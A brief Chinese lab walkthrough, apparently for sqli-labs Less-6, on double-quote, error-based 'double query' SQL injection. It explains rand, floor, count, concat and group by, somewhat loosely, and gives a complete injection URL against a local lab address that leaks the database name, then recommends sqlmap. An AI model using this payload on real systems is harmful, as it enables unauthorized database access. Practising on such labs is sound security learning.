GET - Double Injection - Double Quotes - String(双引号的双注入)
步骤和上面一题一致,只是变成双引号
这次不妨换一种注法
rand()生成介于0~1之间的随机数
floor()向下舍入为指定小数位数
count()函数返回指定的值的数目
concat()将多个字符串连接成一个字符串
group by根据要求对结果排序
http://192.168.147.133/Less-6/?id=0" union select count(*),2,concat(':',(select database()),':',floor(rand()*2))as a from information_schema.tables group by a%23
说实话这种普通注入,没有过滤的话用sqlmap最简单
